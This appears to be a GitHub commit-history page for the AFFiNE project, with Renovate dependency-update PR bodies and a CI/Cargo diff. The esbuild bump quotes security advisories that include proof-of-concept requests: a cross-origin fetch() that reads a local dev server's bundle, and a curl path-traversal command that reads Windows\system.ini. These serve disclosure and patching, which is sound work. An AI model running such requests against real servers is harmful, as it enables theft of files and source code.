Source](https://redirect.github.com/nestjs/nest/compare/v11.1.24...v11.1.25)

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about these
updates again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yMTkuMCIsInVwZGF0ZWRJblZlciI6IjQzLjIxOS4wIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-06-18 22:06:24 +08:00
renovate[bot] 01d7ef88e3 chore: bump up esbuild version to ^0.28.0 [SECURITY] (#15128)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [esbuild](https://redirect.github.com/evanw/esbuild) | [`^0.25.12` →
`^0.28.0`](https://renovatebot.com/diffs/npm/esbuild/0.25.12/0.28.1) |
![age](https://developer.mend.io/api/mc/badges/age/npm/esbuild/0.28.1?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/esbuild/0.25.12/0.28.1?slim=true)
|

---

> [!WARNING]
> Some dependencies could not be looked up. Check the [Dependency
Dashboard](../issues/5188) for more information.

---

### esbuild enables any website to send any requests to the development
server and read the response

[GHSA-67mh-4wv8-2f99](https://redirect.github.com/advisories/GHSA-67mh-4wv8-2f99)

<details>
<summary>More information</summary>

#### Details
##### Summary

esbuild allows any website to send any request to the development
server and read the response due to default CORS settings.

##### Details

esbuild sets the `Access-Control-Allow-Origin: *` header on the response
to every request, including the SSE connection, which allows any website
to send any request to the development server and read the response.


https://github.com/evanw/esbuild/blob/df815ac27b84f8b34374c9182a93c94718f8a630/pkg/api/serve_other.go#L121

https://github.com/evanw/esbuild/blob/df815ac27b84f8b34374c9182a93c94718f8a630/pkg/api/serve_other.go#L363

**Attack scenario**:

1. The attacker serves a malicious web page
(`http://malicious.example.com`).
1. The user accesses the malicious web page.
1. JavaScript on that malicious web page sends a
`fetch('http://127.0.0.1:8000/main.js')` request. Reading the response
would normally be blocked by the same-origin policy, but the wildcard
CORS header described above permits it.
1. The attacker gets the content of `http://127.0.0.1:8000/main.js`.

In this scenario, I assumed that the attacker knows the URL of the
bundle output file name. But the attacker can also get that information
by

- Fetching `/index.html`: normally you have a script tag here
- Fetching `/assets`: it's common to have an `assets` directory when you
have JS files and CSS files in a different directory, and the directory
listing feature tells the attacker the list of files
- Connecting `/esbuild` SSE endpoint: the SSE endpoint sends the URL
path of the changed files when the file is changed (`new
EventSource('/esbuild').addEventListener('change', e =>
console.log(e.type, e.data))`)
- Fetching URLs in the known file: once the attacker knows one file, the
attacker can know the URLs imported from that file

The scenario above fetches the compiled content, but if the victim has
the source map option enabled, the attacker can also get the
non-compiled content by fetching the source map file.
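
Why the wildcard header matters can be sketched with a deliberately simplified model of the browser's read check. This is an illustration only: `canPageReadResponse` is a hypothetical helper, and it ignores credentials, preflight requests, and other parts of the real CORS algorithm.

```js
// Simplified model: may a page at `pageOrigin` read the response from `targetUrl`,
// given the Access-Control-Allow-Origin value the server sent (if any)?
function canPageReadResponse(pageOrigin, targetUrl, allowOriginHeader) {
  const targetOrigin = new URL(targetUrl).origin;
  if (pageOrigin === targetOrigin) return true; // same origin: always readable
  if (allowOriginHeader === '*') return true;   // wildcard: any page may read
  return allowOriginHeader === pageOrigin;      // otherwise the origin must match
}

const attackerPage = 'http://malicious.example.com';
const devServerUrl = 'http://127.0.0.1:8000/main.js';

// With the wildcard header, the malicious page can read the bundle.
const withWildcard = canPageReadResponse(attackerPage, devServerUrl, '*');

// Without any CORS header, the same read is refused.
const withoutHeader = canPageReadResponse(attackerPage, devServerUrl, undefined);

// A page served by the dev server itself is unaffected either way.
const sameOrigin = canPageReadResponse('http://127.0.0.1:8000', devServerUrl, undefined);

console.log({ withWildcard, withoutHeader, sameOrigin });
```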

##### PoC

1. Download
[reproduction.zip](https://redirect.github.com/user-attachments/files/18561484/reproduction.zip)
2. Extract it and move to that directory
3. Run `npm i`
4. Run `npm run watch`
5. Run `fetch('http://127.0.0.1:8000/app.js').then(r =>
r.text()).then(content => console.log(content))` in a different
website's dev tools.


![image](https://redirect.github.com/user-attachments/assets/08fc2e4d-e1ec-44ca-b0ea-78a73c3c40e9)

##### Impact

Users using the serve feature may get the source code stolen by
malicious websites.

#### Severity
- CVSS Score: 5.3 / 10 (Medium)
- Vector String: `CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N`

#### References
-
[https://github.com/evanw/esbuild/security/advisories/GHSA-67mh-4wv8-2f99](https://redirect.github.com/evanw/esbuild/security/advisories/GHSA-67mh-4wv8-2f99)
-
[https://github.com/evanw/esbuild/commit/de85afd65edec9ebc44a11e245fd9e9a2e99760d](https://redirect.github.com/evanw/esbuild/commit/de85afd65edec9ebc44a11e245fd9e9a2e99760d)
-
[https://github.com/advisories/GHSA-67mh-4wv8-2f99](https://redirect.github.com/advisories/GHSA-67mh-4wv8-2f99)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-67mh-4wv8-2f99)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### esbuild allows arbitrary file read when running the development
server on Windows

[GHSA-g7r4-m6w7-qqqr](https://redirect.github.com/advisories/GHSA-g7r4-m6w7-qqqr)

<details>
<summary>More information</summary>

#### Details
##### Summary

The development server contains a path traversal vulnerability on
Windows when serving files from `servedir`.

Due to the use of `path.Clean()` (which only normalizes forward-slash
`/` separators) instead of a Windows-aware path normalization function,
it is possible to craft requests using backslashes (`\`) that bypass the
intended directory containment logic. An attacker can escape the
configured `servedir` root and access arbitrary files on the filesystem.
This issue affects Windows environments only.

##### Details

The request path is sanitized using:
```go
// https://github.com/evanw/esbuild/blob/v0.27.3/pkg/api/serve_other.go#L165
queryPath := path.Clean(req.URL.Path)[1:]
```

However:
- `path.Clean()` is POSIX-style and only understands `/` (docs:
`https://pkg.go.dev/path#Clean`)
- On Windows, `\` is a valid path separator
- `path.Clean()` does not treat `\` as a separator

Later, the server constructs the absolute path:
```go
// https://github.com/evanw/esbuild/blob/v0.27.3/pkg/api/serve_other.go#L221
absPath := h.fs.Join(h.servedir, queryPath)
```

If `queryPath` contains sequences such as:
```
..\..\..\..\..\..\..\Windows\system.ini
```

`path.Clean()` will not normalize them, but the Windows filesystem will
interpret `\` as directory separators when resolving `absPath`.
Because the implementation does not verify that the final resolved path
remains within `servedir`, it allows directory traversal outside the
intended root directory.
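
The same mismatch can be reproduced with Node's `path` module, which ships both a POSIX and a Windows flavor. This is an analogy written in JavaScript, not esbuild's Go code: `path.posix.normalize` stands in for Go's `path.Clean()`, `path.win32.join` stands in for the Windows-aware join, and `servedir` and `isInsideServedir` are hypothetical names. The containment check is one possible guard, shown only as a sketch.

```js
const path = require('node:path');

const servedir = 'C:\\www'; // hypothetical serve root

// Step 1: POSIX-style cleaning only understands '/', so the backslash
// sequence is treated as one opaque file name and survives unchanged.
const requestPath = '/..\\..\\..\\Windows\\system.ini';
const queryPath = path.posix.normalize(requestPath).slice(1);

// Step 2: a Windows-aware join treats '\' as a separator and climbs out of the root.
const absPath = path.win32.join(servedir, queryPath);

// One possible guard: the resolved path must not lead outside the root.
function isInsideServedir(root, candidate) {
  const rel = path.win32.relative(root, candidate);
  const escapes = rel === '..' || rel.startsWith('..\\');
  return !escapes && !path.win32.isAbsolute(rel);
}

const escaped = !isInsideServedir(servedir, absPath);
const legit = isInsideServedir(servedir, path.win32.join(servedir, 'app.js'));

console.log(queryPath); // ..\..\..\Windows\system.ini
console.log(absPath);   // C:\Windows\system.ini
console.log({ escaped, legit });
```

Because the `win32` and `posix` variants are selected explicitly, the sketch behaves the same on any operating system.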

##### Vulnerable Code

```go
// https://github.com/evanw/esbuild/blob/v0.27.3/pkg/api/serve_other.go#L165
	queryPath := path.Clean(req.URL.Path)[1:]
	....
	// Check for a file in the "servedir" directory
	if h.servedir != "" && kind != fs.FileEntry {
		absPath := h.fs.Join(h.servedir, queryPath)
		if absDir := h.fs.Dir(absPath); absDir != absPath {
			if entries, err, _ := h.fs.ReadDirectory(absDir); err == nil {
				if entry, _ := entries.Get(h.fs.Base(absPath)); entry != nil && entry.Kind(h.fs) == fs.FileEntry {
	....				
```

##### Steps to reproduce

```
npm install --save-exact --save-dev esbuild

echo "console.log(1)" > app.js

.\node_modules\.bin\esbuild --version
0.27.3

.\node_modules\.bin\esbuild app.js --bundle --outdir=www --servedir=www --watch

curl -i --path-as-is "http://localhost:8000/..\..\..\..\..\..\..\Windows\system.ini"
<content of Windows\system.ini>
```

##### Impact

- Arbitrary file read on Windows
- Exposure of sensitive files

#### Severity
- CVSS Score: 2.5 / 10 (Low)
- Vector String: `CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N`

#### References
-
[https://github.com/evanw/esbuild/security/advisories/GHSA-g7r4-m6w7-qqqr](https://redirect.github.com/evanw/esbuild/security/advisories/GHSA-g7r4-m6w7-qqqr)
-
[https://github.com/evanw/esbuild/releases/tag/v0.28.1](https://redirect.github.com/evanw/esbuild/releases/tag/v0.28.1)
-
[https://github.com/advisories/GHSA-g7r4-m6w7-qqqr](https://redirect.github.com/advisories/GHSA-g7r4-m6w7-qqqr)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-g7r4-m6w7-qqqr)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Release Notes

<details>
<summary>evanw/esbuild (esbuild)</summary>

###
[`v0.28.1`](https://redirect.github.com/evanw/esbuild/blob/HEAD/CHANGELOG.md#0281)

[Compare
Source](https://redirect.github.com/evanw/esbuild/compare/v0.28.0...v0.28.1)

- Disallow `\\` in local development server HTTP requests
([GHSA-g7r4-m6w7-qqqr](https://redirect.github.com/evanw/esbuild/security/advisories/GHSA-g7r4-m6w7-qqqr))

This release fixes a security issue where HTTP requests to esbuild's
local development server could traverse outside of the serve directory
on Windows by using a `\` backslash character. This happened because
Go's `path.Clean()` function only treats the Unix-style `/` character as
a path separator, so `..\` sequences were not normalized away. HTTP
requests with paths containing `\` are no longer allowed.

Thanks to [@dellalibera](https://redirect.github.com/dellalibera)
for reporting this issue.
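
To make the failure mode concrete, here is a minimal TypeScript sketch. It is not esbuild's actual Go code: `cleanPosix` is a hypothetical stand-in that mimics only one property of Go's `path.Clean()` (treating `/` as the sole separator), and `isAllowedRequestPath` is a hypothetical guard written in the spirit of the fix described above.

```typescript
// Hypothetical stand-in for a POSIX-only path cleaner: "/" is the only
// separator it knows about, so a backslash is just an ordinary character.
function cleanPosix(p: string): string {
  const out: string[] = [];
  for (const segment of p.split("/")) {
    if (segment === "" || segment === ".") continue;
    if (segment === "..") {
      out.pop(); // on a rooted path, ".." at the root is simply dropped
    } else {
      out.push(segment);
    }
  }
  return "/" + out.join("/");
}

// Hypothetical guard in the spirit of the fix: reject any backslash outright.
function isAllowedRequestPath(p: string): boolean {
  return !p.includes("\\");
}

// "/"-separated traversal is collapsed and stays under the root.
const unixStyle = cleanPosix("/../../etc/passwd");

// "\"-separated traversal is one opaque segment, so it passes through intact.
const windowsStyle = cleanPosix("/..\\..\\Windows\\system.ini");

console.log(unixStyle, windowsStyle, isAllowedRequestPath(windowsStyle));
```

The `/`-separated request is reduced to a path under the root, while the `\`-separated one comes back unchanged. Once such a string is joined to the serve directory on Windows, the file system treats each `..\` as a parent-directory hop, which is why rejecting `\` up front closes the hole.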

- Add integrity checks to the Deno API
([GHSA-gv7w-rqvm-qjhr](https://redirect.github.com/evanw/esbuild/security/advisories/GHSA-gv7w-rqvm-qjhr))

The previous release of esbuild added integrity checks to esbuild's npm
install script. This release also adds integrity checks to esbuild's
Deno install script. Now esbuild's Deno API will also fail with an error
if the downloaded esbuild binary contains something other than the
expected content.

Note that esbuild's Deno API installs from `registry.npmjs.org` by
default, but allows the `NPM_CONFIG_REGISTRY` environment variable to
override this with a custom package registry. This change means that the
esbuild executable served by `NPM_CONFIG_REGISTRY` must now match the
expected content.

Thanks to [@sondt99](https://redirect.github.com/sondt99) for
reporting this issue.

- Avoid inlining `using` and `await using` declarations
([#4482](https://redirect.github.com/evanw/esbuild/issues/4482))

Previously esbuild's minifier sometimes incorrectly inlined `using` and
`await using` declarations into subsequent uses of that declaration,
which meant the resource was no longer disposed of correctly. This bug
happened because inlining was enabled for `let` and `const` declarations
by excluding `var` declarations, a check that stopped being correct once
more declaration types were added. Here's an example:

  ```js
  // Original code
  {
    using x = new Resource()
    x.activate()
  }

  // Old output (with --minify)
  new Resource().activate();

  // New output (with --minify)
  {using e=new Resource;e.activate()}
  ```

- Fix module evaluation when an error is thrown
([#4461](https://redirect.github.com/evanw/esbuild/issues/4461),
[#4467](https://redirect.github.com/evanw/esbuild/pull/4467))

If an error is thrown during module evaluation, esbuild previously
didn't preserve the state of the module for subsequent module
references. This was observable if `import()` or `require()` is used to
import a module multiple times. The thrown error is supposed to be
thrown by every call to `import()` or `require()`, not just the first.
With this release, esbuild will now throw the same error every time you
call `import()` or `require()` on a module that throws during its
evaluation.
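
The behavior described above can be pictured with a small TypeScript sketch of a module cache that remembers failures. This is an illustration under stated assumptions, not esbuild's generated runtime code: `requireOnce`, `evaluateModule`, and `ModuleRecord` are hypothetical names.

```typescript
// Hypothetical record of a module's evaluation outcome.
type ModuleRecord =
  | { state: "ok"; exports: unknown }
  | { state: "failed"; error: unknown };

const cache = new Map<string, ModuleRecord>();

// Run the module body once and capture either its exports or its error.
function evaluateModule(evaluate: () => unknown): ModuleRecord {
  try {
    return { state: "ok", exports: evaluate() };
  } catch (error) {
    return { state: "failed", error };
  }
}

// Evaluate on first use; afterwards replay the stored outcome, including
// rethrowing the original error object on every later call.
function requireOnce(id: string, evaluate: () => unknown): unknown {
  let record = cache.get(id);
  if (record === undefined) {
    record = evaluateModule(evaluate);
    cache.set(id, record);
  }
  if (record.state === "failed") throw record.error;
  return record.exports;
}

let evaluations = 0;
const boom = new Error("init failed");
const caught: unknown[] = [];

for (let i = 0; i < 2; i++) {
  try {
    requireOnce("./broken", () => {
      evaluations++;
      throw boom;
    });
  } catch (error) {
    caught.push(error);
  }
}

console.log(evaluations, caught.length);
```

The module body runs only once, yet both calls observe the same thrown error, which matches the "every call, not just the first" semantics the release note describes.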

- Fix some edge cases around the `new` operator
([#4477](https://redirect.github.com/evanw/esbuild/issues/4477))

Previously esbuild incorrectly printed certain edge cases involving
complex expressions inside the target of a `new` expression
(specifically an optional chain and/or a tagged template literal). The
generated code for the `new` target was not correctly wrapped with
parentheses, and either contained a syntax error or had different
semantics. These edge cases have been fixed so that they now correctly
wrap the `new` target in parentheses. Here is an example of some
affected code:

  ```js
  // Original code
  new (foo()`bar`)()
  new (foo()?.bar)()

  // Old output
  new foo()`bar`();
  new (foo())?.bar();

  // New output
  new (foo())`bar`();
  new (foo()?.bar)();
  ```

- Fix renaming of nested `var` declarations
([#4471](https://redirect.github.com/evanw/esbuild/issues/4471))

This release fixes a bug where `var` declarations in nested scopes that
are hoisted up to module scope were not correctly being renamed during
bundling. That could previously lead to name collisions when
minification was disabled, which could potentially cause a behavior
change. The bug has been fixed so that these hoisted declarations are
now considered to be module-level symbols during the name collision
avoidance pass.
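
The language behavior behind this bug can be sketched in TypeScript. The example below only illustrates `var` hoisting and the resulting collision; it is not esbuild's renaming pass, and the two functions are hypothetical stand-ins for a bundle scope that holds code from two files.

```typescript
// Bundled without renaming: file B's nested `var count` hoists into the
// same scope as file A's `count`, so both declarations name one binding.
function bundledWithoutRenaming(): [number, number] {
  {
    var count = 1; // from hypothetical file A, declared in a nested block
  }
  const readFromA = () => count; // file A reads its own variable later
  {
    var count = 100; // from hypothetical file B, hoisted onto A's binding
  }
  return [readFromA(), count];
}

// Bundled with renaming: file B's hoisted symbol gets a distinct name.
function bundledWithRenaming(): [number, number] {
  {
    var count = 1; // from hypothetical file A
  }
  const readFromA = () => count;
  {
    var count2 = 100; // file B's symbol, renamed to avoid the collision
  }
  return [readFromA(), count2];
}

const collided = bundledWithoutRenaming();
const renamed = bundledWithRenaming();
console.log(collided, renamed);
```

In the first function file A ends up reading file B's value, which is the kind of behavior change the release note warns about. Treating hoisted declarations as scope-level symbols during collision avoidance yields the second shape.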

- Emit `var` instead of `const` for certain TypeScript-only constructs
for ES5
([#4448](https://redirect.github.com/evanw/esbuild/issues/4448))

While esbuild doesn't generally support converting `const` to `var` for
ES5 due to nested scoping rules (which is currently a build-time error),
esbuild previously incorrectly converted TypeScript-only `import`
assignment constructs into a `const` declaration even when targeting
ES5. With this release, esbuild will now use `var` for this case
instead:

  ```js
  // Original code
  import x = require('y')

  // Old output (with --target=es5)
  const x = require("y");

  // New output (with --target=es5)
  var x = require("y");
  ```

### `v0.28.0`

[Compare
Source](https://redirect.github.com/evanw/esbuild/compare/v0.27.7...v0.28.0)

### `v0.27.7`

[Compare
Source](https://redirect.github.com/evanw/esbuild/compare/v0.27.5...v0.27.7)

### `v0.27.5`

[Compare
Source](https://redirect.github.com/evanw/esbuild/compare/v0.27.4...v0.27.5)

### `v0.27.4`

[Compare
Source](https://redirect.github.com/evanw/esbuild/compare/v0.27.3...v0.27.4)

### `v0.27.3`

[Compare
Source](https://redirect.github.com/evanw/esbuild/compare/v0.27.2...v0.27.3)

### `v0.27.2`

[Compare
Source](https://redirect.github.com/evanw/esbuild/compare/v0.27.1...v0.27.2)

### `v0.27.1`

[Compare
Source](https://redirect.github.com/evanw/esbuild/compare/v0.27.0...v0.27.1)

### `v0.27.0`

[Compare
Source](https://redirect.github.com/evanw/esbuild/compare/v0.26.0...v0.27.0)

### `v0.26.0`

[Compare
Source](https://redirect.github.com/evanw/esbuild/compare/v0.25.12...v0.26.0)

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yMTkuMCIsInVwZGF0ZWRJblZlciI6IjQzLjIxOS4wIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-06-18 17:41:44 +08:00
DarkSky 154d9e975d fix: deps & config (#15126) 2026-06-18 14:41:48 +08:00
renovate[bot] 24e07f73bb chore: bump up capacitor-plugin-app-tracking-transparency version to v3 (#15079)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
|
[capacitor-plugin-app-tracking-transparency](https://redirect.github.com/mahnuh/capacitor-plugin-app-tracking-transparency)
| [`^2.0.5` →
`^3.0.0`](https://renovatebot.com/diffs/npm/capacitor-plugin-app-tracking-transparency/2.0.5/3.0.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/capacitor-plugin-app-tracking-transparency/3.0.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/capacitor-plugin-app-tracking-transparency/2.0.5/3.0.0?slim=true)
|

---

### Release Notes

<details>
<summary>mahnuh/capacitor-plugin-app-tracking-transparency
(capacitor-plugin-app-tracking-transparency)</summary>

###
[`v3.0.0`](https://redirect.github.com/mahnuh/capacitor-plugin-app-tracking-transparency/releases/tag/v3.0.0)

[Compare
Source](https://redirect.github.com/mahnuh/capacitor-plugin-app-tracking-transparency/compare/v2.0.5...v3.0.0)

- Add support for Swift Package Manager
([#29](https://redirect.github.com/mahnuh/capacitor-plugin-app-tracking-transparency/issues/29))
[`40051d6`](https://redirect.github.com/mahnuh/capacitor-plugin-app-tracking-transparency/commit/40051d6)
- Update README.md
[`d8c4d27`](https://redirect.github.com/mahnuh/capacitor-plugin-app-tracking-transparency/commit/d8c4d27)

***

</details>


Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
Co-authored-by: DarkSky <25152247+darkskygit@users.noreply.github.com>
2026-06-18 13:00:42 +08:00
DarkSky d500e472f0 chore: bump deps (#15124) 2026-06-18 12:55:18 +08:00
DarkSky 13d9fe506e feat(native): cleanup vendored deps (#15119)
#### PR Dependency Tree


* **PR #15119** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Breaking Changes**
  * Removed major Rust public APIs related to document/CRDT encoding,
    synchronization, and document loading from the affected packages.
* **Chores**
  * Migrated internal dependency usage to published crates and trimmed the
    Rust workspace/feature surface.
* **CI/CD**
  * Simplified the Rust CI pipeline by removing advanced testing jobs and
    updating job dependencies.
* **Dev/Test/Bench**
  * Removed associated benchmark and fuzzing artifacts and related
    fixture/test utilities.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-06-18 02:55:30 +08:00
DarkSky 1256d66938 fix(server): sync permission check (#15123)
fix #15121



#### PR Dependency Tree


* **PR #15123** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Security Improvements**
  * Enforced document-level `Doc.Read`/`Doc.Update` checks for key sync
    websocket operations, including filtering workspace doc timestamp
    results to only readable documents.
  * Improved remote permission handling: once a remote denies access,
    syncing stops for the affected document and retry behavior is
    suppressed.
* **Improvements**
  * `delete-doc` now relies on server acknowledgment and returns an
    explicit `{ success: true }`.
  * Websocket acknowledgment errors are now normalized for consistent
    error details.
* **Tests**
  * Expanded permission-denied and websocket error-handling coverage,
    including timestamp filtering and no-retry behavior after permission
    denial.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
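
The timestamp filtering mentioned in the summary above can be pictured with a short TypeScript sketch. Everything in it is hypothetical: `filterReadableTimestamps`, the `CanRead` callback, and the in-memory ACL are illustrative names only, and the actual server code for this commit is not shown on this page.

```typescript
type DocId = string;

// Hypothetical permission check standing in for a `Doc.Read` lookup.
type CanRead = (userId: string, docId: DocId) => boolean;

// Keep only the timestamps of documents the user is allowed to read.
function filterReadableTimestamps(
  userId: string,
  timestamps: Record<DocId, number>,
  canRead: CanRead
): Record<DocId, number> {
  const readable: Record<DocId, number> = {};
  for (const docId of Object.keys(timestamps)) {
    if (canRead(userId, docId)) {
      readable[docId] = timestamps[docId];
    }
  }
  return readable;
}

// Illustrative in-memory ACL: alice may read doc-1 and doc-3 only.
const acl = new Map<string, Set<DocId>>([
  ["alice", new Set(["doc-1", "doc-3"])],
]);
const canRead: CanRead = (userId, docId) =>
  acl.get(userId)?.has(docId) ?? false;

const allTimestamps = { "doc-1": 1000, "doc-2": 2000, "doc-3": 3000 };
const forAlice = filterReadableTimestamps("alice", allTimestamps, canRead);
const forBob = filterReadableTimestamps("bob", allTimestamps, canRead);
console.log(forAlice, forBob);
```

Filtering the response this way avoids leaking even the existence or update time of documents the caller cannot read.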
2026-06-18 02:43:25 +08:00
167 changed files with 3152 additions and 18274 deletions
-1
@@ -31,7 +31,6 @@
"groupSlug": "all-minor-patch",
"matchUpdateTypes": ["minor", "patch"],
"matchManagers": ["npm"],
"matchPackageNames": ["*"],
"excludePackagePatterns": ["^@blocksuite/", "^oxlint$"]
},
{
-96
@@ -948,99 +948,6 @@ jobs:
name: affine
fail_ci_if_error: false
miri:
name: miri code check
if: ${{ needs.rust-test-filter.outputs.run-rust == 'true' }}
runs-on: ubuntu-latest
needs:
- rust-test-filter
env:
RUST_BACKTRACE: full
CARGO_TERM_COLOR: always
MIRIFLAGS: -Zmiri-backtrace=full -Zmiri-tree-borrows
steps:
- uses: actions/checkout@v6
- name: Setup Rust
uses: dtolnay/rust-toolchain@stable
with:
toolchain: nightly
components: miri
- name: Install latest nextest release
uses: taiki-e/install-action@v2
with:
tool: nextest@0.9.98
- name: Miri Code Check
continue-on-error: true
run: |
cargo +nightly miri nextest run -p y-octo -j4
loom:
name: loom thread test
if: ${{ needs.rust-test-filter.outputs.run-rust == 'true' }}
runs-on: ubuntu-latest
needs:
- rust-test-filter
env:
RUSTFLAGS: --cfg loom
RUST_BACKTRACE: full
CARGO_TERM_COLOR: always
steps:
- uses: actions/checkout@v6
- name: Setup Rust
uses: dtolnay/rust-toolchain@stable
with:
toolchain: stable
- name: Install latest nextest release
uses: taiki-e/install-action@v2
with:
tool: nextest@0.9.98
- name: Loom Thread Test
run: |
cargo nextest run -p y-octo --lib
fuzzing:
name: fuzzing
if: ${{ needs.rust-test-filter.outputs.run-rust == 'true' }}
runs-on: ubuntu-latest
needs:
- rust-test-filter
env:
CARGO_TERM_COLOR: always
steps:
- uses: actions/checkout@v6
- name: Setup Rust
uses: dtolnay/rust-toolchain@stable
with:
toolchain: nightly
- name: fuzzing
working-directory: ./packages/common/y-octo/utils
run: |
cargo install cargo-fuzz
cargo +nightly fuzz run apply_update -- -max_total_time=30
cargo +nightly fuzz run codec_doc_any_struct -- -max_total_time=30
cargo +nightly fuzz run codec_doc_any -- -max_total_time=30
cargo +nightly fuzz run decode_bytes -- -max_total_time=30
cargo +nightly fuzz run i32_decode -- -max_total_time=30
cargo +nightly fuzz run i32_encode -- -max_total_time=30
cargo +nightly fuzz run ins_del_text -- -max_total_time=30
cargo +nightly fuzz run sync_message -- -max_total_time=30
cargo +nightly fuzz run u64_decode -- -max_total_time=30
cargo +nightly fuzz run u64_encode -- -max_total_time=30
cargo +nightly fuzz run apply_update -- -max_total_time=30
- name: upload fuzz artifacts
if: ${{ failure() }}
uses: actions/upload-artifact@v4
with:
name: fuzz-artifact
path: packages/common/y-octo/utils/fuzz/artifacts/**/*
rust-test:
name: Run native tests
if: ${{ needs.rust-test-filter.outputs.run-rust == 'true' }}
@@ -1498,9 +1405,6 @@ jobs:
- build-server-native
- build-electron-renderer
- native-unit-test
- miri
- loom
- fuzzing
- server-test
- server-e2e-test
- rust-test
Generated
+452 -501
File diff suppressed because it is too large
+2 -23
@@ -2,8 +2,6 @@
members = [
"./packages/backend/native",
"./packages/common/native",
"./packages/common/y-octo/core",
"./packages/common/y-octo/utils",
"./packages/frontend/mobile-native",
"./packages/frontend/native",
"./packages/frontend/native/nbstore",
@@ -23,7 +21,6 @@ resolver = "3"
anyhow = "1"
arbitrary = { version = "1.3", features = ["derive"] }
assert-json-diff = "2.0"
async-lock = { version = "3.4.0", features = ["loom"] }
base64-simd = "0.8"
bitvec = "1.0"
block2 = "0.6"
@@ -37,7 +34,7 @@ resolver = "3"
criterion2 = { version = "3", default-features = false }
crossbeam-channel = "0.5"
dispatch2 = "0.3"
- docx-parser = { git = "https://github.com/toeverything/docx-parser", rev = "380beea" }
+ doc_extractor = "0.1.0"
dotenvy = "0.15"
file-format = { version = "0.28", features = ["reader"] }
hex = "0.4"
@@ -58,7 +55,6 @@ resolver = "3"
llm_adapter = { version = "0.2", default-features = false }
llm_runtime = { version = "0.2", default-features = false }
log = "0.4"
loom = { version = "0.7", features = ["checkpoint"] }
lru = "0.16"
matroska = "0.30"
memory-indexer = "0.3.1"
@@ -84,8 +80,6 @@ resolver = "3"
ordered-float = "5"
p256 = { version = "0.13", features = ["ecdsa", "pem"] }
parking_lot = "0.12"
path-ext = "0.1.2"
pdf-extract = { git = "https://github.com/toeverything/pdf-extract", branch = "darksky/improve-font-decoding" }
phf = { version = "0.11", features = ["macros"] }
proptest = "1.3"
proptest-derive = "0.5"
@@ -94,7 +88,6 @@ resolver = "3"
rand_chacha = "0.9"
rand_distr = "0.5"
rayon = "1.10"
readability = { version = "0.3.0", default-features = false }
regex = "1.10"
rubato = "0.16"
safefetch = "0.1.0"
@@ -112,24 +105,10 @@ resolver = "3"
"runtime-tokio",
"sqlite",
] }
strum_macros = "0.27.0"
symphonia = { version = "0.5", features = ["all", "opt-simd"] }
text-splitter = "0.27"
thiserror = "2"
tiktoken-rs = "0.7"
tokio = "1.45"
tree-sitter = { version = "0.25" }
tree-sitter-c = { version = "0.24" }
tree-sitter-c-sharp = { version = "0.23" }
tree-sitter-cpp = { version = "0.23" }
tree-sitter-go = { version = "0.23" }
tree-sitter-java = { version = "0.23" }
tree-sitter-javascript = { version = "0.23" }
tree-sitter-kotlin-ng = { version = "1.1" }
tree-sitter-python = { version = "0.23" }
tree-sitter-rust = { version = "0.24" }
tree-sitter-scala = { version = "0.24" }
tree-sitter-typescript = { version = "0.23" }
typst = "0.14.2"
typst-as-lib = { version = "0.15.4", default-features = false, features = [
"packages",
@@ -155,7 +134,7 @@ resolver = "3"
"Win32_UI_Shell_PropertiesSystem",
] }
windows-core = { version = "0.61" }
- y-octo = { path = "./packages/common/y-octo/core" }
+ y-octo = "0.0.3"
y-sync = { version = "0.4" }
yrs = "0.23.0"
